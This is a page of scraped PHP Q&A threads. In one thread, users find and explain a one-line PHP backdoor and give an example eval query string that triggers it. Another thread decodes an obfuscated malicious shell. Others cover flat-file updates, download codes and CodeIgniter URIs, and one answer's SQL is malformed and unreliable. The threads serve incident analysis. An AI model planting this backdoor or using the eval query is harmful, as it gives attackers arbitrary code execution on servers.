Hi I found this code in my website files is this some kind of backdoor?can someone explain this code line by line
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Yes, this is malicious code.
Before spending any time looking at it, you should immediately take the site offline and replace it with a known-good copy, e.g. a backup or the official release. You should also make sure everything on your server is up to date and change your admin passwords. The fact that this code is there means your code was already compromised.
To confirm I'm not being over-dramatic, here's how the code works:
The first two lines generate a string containing the letters 'GET' by using bitwise XOR operations.
The third line then adds an '_' at the beginning, and executes $_GET["_"]($_GET["__"]);, echoing the result with <?=
This allows the attacker to access the page with a query string where _ is a function name and __ is its argument; PHP will run the function and display the result.
This in turn allows them to run any code they like, because they can just go to `/yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();
But to reiterate, the above is only to satisfy curiosity; this is a case where you should "shoot first, ask questions later". As soon as you've identified the code shouldn't be there, assume you've been compromised.
Related
I'm having this issue with the JSONAPI for minecraft. http://mcjsonapi.com/
I am trying to use the method "files.write" or "setFileContents" to replace the contents of a file. The website states this about the method.
Pretty simple. Just rewrites the file right? Yeah but this is proving to be more difficult then I thought. At first attempt, I was trying to set 3450 characters to the file "groups.yml" on the minecraft server. Here's the code I ran in PHP:
var_dump(
$api->call("files.write", array("plugins/GroupManager/worlds/world/groups.yml", (string)$yaml))
);
The var_dump is supposed to either return a success statement or an error describing what went wrong. But instead all I get is "null". This isn't right, and I know $yaml is being casted to a string, which isn't the issue. So I decide to start testing around. After much testing, I find that the character length of what I can set is exactly 1622. Adding another space or anything causes null, otherwise, it works. This is the modified file that is below 1622 characters I tested with.
So great, you found the issue, right? No, I didn't. I thought 1622 was an odd number to stop working, so I did some further testing. I tried to set 3000 characters I generated from just smashing my keyboard, and it worked! So what's going on here?
This and this works, but this doesn't. Why is this? This app called Adminium runs this exact API, and includes a file management system inside the app which I am assuming uses the same methods I am using, but it doesn't have a problem.
I have a forum post here that I also asked on, and still haven't gotten to an answer yet.
Today I've found a malware on one site, I have deleted it, of course, and everything is ok, but in order to understand where it comes from, I would like to understand its logic, but it is encoded, in a quite easy way. At the beginning of the file I see:
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
This is used then in all the rest of the file, as a dictionary of characters, from now on, there are all assignments like this:
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
Does anyone has a clue on how I can decode this (without infecting a server of mine, of course), or at least has the name of this type of encryption? Just to know if I can find something on the web.
If someone is interested, I can post the rest of the file, I found it odd.
Update: the file is actually a malicious shell hack. If you find it on your server, delete it and contact your sysadmin.
It is obfuscating the phrase "error_reporting"
<?php
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
echo $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
$GLOBALS['rpdxi45'] is storing a string constructed from the characters of the string held in $i96.
Echoing $GLOBALS['rpdxi45'] will show you the string that has been constructed.
See here: http://ideone.com/Jy1uty
There are quite a few different threads about this similar topic, yet I have not been able to fully comprehend a solution to my problem.
What I'd like to do is quite simple, I have a flat-file db, with data stored like this -
$username:$worldLocation:$resources
The issue is I would like to have a submit data html page that would update this line based upon a search of the term using php
search db for - $worldLocation
if $worldLocation found
replace entire line with $username:$worldLocation:$updatedResources
I know there should be a fairly easy way to get this done but I am unable to figure it out at the moment, I will keep trying as this post is up but if you know a way that I could use I would greatly appreciate the help.
Thank you
I always loved c, and functions that came into php from c.
Check out fscanf and fprintf.
These will make your life easier while reading writing in a format. Like say:
$filehandle = fopen("file.txt", "c");
while($values = fscanf($filehandle, "%s\t%s\t%s\n")){
list($a, $b, $c) = $values;
// do something with a,b,c
}
Also, there is no performance workaround for avoiding reading the entire file into memory -> changing one line -> writing the entire file. You have to do it.
This is as efficient as you can get. Because you most probably using native c code since I read some where that php just wraps c's functions in these cases.
You like the hard way so be it....
Make each line the same length. Add space, tab, capital X etc to fill in the blanks
When you want to replace the line, find it and as each line is of a fixed length you can replace it.
For speed and less hassle use a database (even SQLLite)
If you're committed to the flat file, the simplest thing is iterating through each line, writing a new file & changing the one that matches.
Yeah, it sucks.
I'd strongly recommend switching over to a 'proper' database. If you're concerned about resources or the complexity of running a server, you can look into SQLite or Berkeley DB. Both of these use a database that is 'just a file', removing the issue of installing and maintaining a DB server, but still you the ability to quickly & easily search, replace and delete individual records. If you still need the flat file for some other reason, you can easily write some import/export routines.
Another interesting possibility, if you want to be creative, would be to look at your filesystem as a database. Give each user a directory. In each directory, have a file for locations. In each file, update the resources. This means that, to insert a row, you just write to a new file. To update a file, you just rewrite a single file. Deleting a user is just nuking a directory. Sure, there's a bit more overhead in slurping the whole thing into memory.
Other ways of solving the problem might be to make your flat-file write-only, since appending to the end of a file is a trivial operation. You then create a second file that lists "dead" line numbers that should be ignored when reading the flat file. Similarly, you could easily "X" out the existing lines (which, again, is far easier than trying to update lines in a file that might not be the same length) and append your new data to the end.
Those second two ideas aren't really meant to be practical solutions as much as they are to show you that there's always more than one way to solve a problem.
ok.... after a few hours work..this example woorked fine for me...
I intended to code an editing tool...and use it for password update..and it did the
trick!
Not only does this page send and email to user (sorry...address harcoded to avoid
posting aditional code) with new password...but it also edits entry for thew user
and re-writes all file info in new file...
when done, it obviously swaps filenames, storing old file as usuarios_old.txt.
grab the code here (sorry stackoverflow got VERY picky about code posting)
https://www.iot-argentina.xyz/edit_flat_databse.txt
Is that what you are location for :
update `field` from `table` set `field to replace` = '$username:$worldlocation:$updatesResources' where `field` = '$worldLocation';
I'm designing a website for a small indie record label and they've dropped a bombshell asking if I could implement a function where a user can enter a code to receive a digital download.
Is there a simple solution to doing this? I was thinking all I would need is an input field where the user can enter a code, it gets verified and then allows a download but it sounds too simple. Is this even possible with something like .php (complete beginner)?
I'm willing to learn or I would've packed it in already so any advice would be great. Thanks.
Edit:
Thanks to some great advice I was able to create this!
If you wanted to do it at a very simple level, it is not much more than you describe it to be. You would need to familiarize with PHP and MySQL or some other database, but it isn't too difficult to create.
You need to figure a few things out, such as how do you want to limit the codes, 3 downloads in the first 24 hours to allow for failed downloads, restrict it to IP, or strictly one full download. Since you have the list of the 1000 codes given, you will probably want to base your system around having codes pre-generated and inserted in the database, rather than having an algorithm that can validate the codes on the fly and then check for already used codes.
You would want to store the download(s) in a directory that is not accessible from the web, and the php script would validate the code, and if valid serve the download to the user.
You can probably look to the wordpress plugin's database structure for other ideas, but I think at the very least you would need:
download_code (the code itself, probably primary key or at least index)
download_file (optional, the name/path of the file this code allows them to download)
redeemed (0 if not redeemed, 1 if redeemed)
redemption_time (timestamp of the first, or last redemption based on your requirements)
download_count (how many times downloaded if allowing more than 1)
ip_address (ip address of the redeemer)
email_address (email address if you want to collect it, or give user the option)
download_url (the unique string for the download url. this could be one way to implement download verification beyond the code, but is not necessary)
You would then need to create an html page with the text box for entering the code, and any other optional data you wish to collect. The form would submit to your PHP script.
When the PHP script receives a form post, it would validate all of the data (i.e. email address if you were collecting it). Once all data is valid, you read from the database looking for a code matching what the user entered.
If no data was found with the code, send them back to the form to try re-entering it. If a record is found, you can check the redeemed value from the database and see if the code has been used or not. If it has, this is where you can use custom logic to decide if they are still within their download window, the ip address is the same, or whatever criteria you want to use to allow re-downloads.
If it has been redeemed, show an error message. If it is still okay to download, you can serve a download by reading the file and sending it to the browser see example #1 here.
At some point you will have to update your database to set the redeemed flag to 1 and update the other values such as timestamp and download count. You can either run this code before you serve the download, or you can run it after the download is served. In some cases if the download was cut off, the last portion of your script won't run and therefore won't update redeemed or download_count. This may or may not be what you want, so you can decide where you want to do the updating.
Eventually you can update it to include an administration panel, but in the beginning all configuration could be done within the php script or config file. And eventually you could update it to use flash or some other technology to download the file and show progress bars etc.
Hopefully that will give you some idea on whether or not you want to try to implement it. Otherwise you could always search php on Hotscripts to see if there is an already rolled standalone version of what you want.
I've been figuring out how to let apostrophe's cross URI's.
I'm building a site that allows users to "create photo albums". I have a link that when clicked, it will load and display all the contents of a certain album. I'm using codeigniter so this page is called this way:
http://www.fourthdraft.com/index.php/admin/manageAlbumContents/dan's/91
admin = controller
managealbums = function
dan's (album name) = variable
As you know, codeigniter does not allow apostrophe(') in uri's. My problems are:
If I htmlspecialchars/htmlentities
the album name it becomes &#xx;
Those new characters also not
allowed
If I url encode it becomes %xx. percent is allowed but codeigniter
urldecodes it before processing so
it just reverts back to apostrophe
I've tried making my own preg_replace ( ' => '~apos~' ) but i
just find it inefficient, too much
lines to run and tedious since I
have an 80% done website and the
strings I have to replace are
everywhere.
I've also considered using base64_encode. It takes more space
but it does the job. Then again, the
encoded version contains '=' which
is also disallowed
As much as possible I do not want to just add apostrophe in the allowed characters list in codeigniter's config file. I believe they don't have it there for a reason. At the same time, I'm running out of options.
The reason for wanting to allow apostrophe's is because in this context, it's bound to be used. For example, what if someone decided to put 'dan's birthday party' as an album name? It's bound to happen. and i'm pretty sure my users would complain. Even if I manage to convince them otherwise, what will i replace that with? dan_s birthday party? looks wrong. Also, if facebook can do it I should too. At the very least, if facebook did it, then that means there's a way.
If you guys have any suggestions, fire away. Otherwise I'm wondering if it's ok (and safe) to just allow apostrophe in the allowed URI characters. I know it's VERY dangerous for mysql which i use a lot but I just remembered codeigniter's query binding variables automatically escapes characters. I'm wondering if that would suffice and keep me safe.
Otherwise, please please please give me a good idea. I'm drained out
I like to believe that the days of mysql_query("SELECT * FROM table WHERE x={$_GET['val']}") are over. That being said, it's OK with any decent database library as long as you use parameter binding. So go ahead and use urlencode.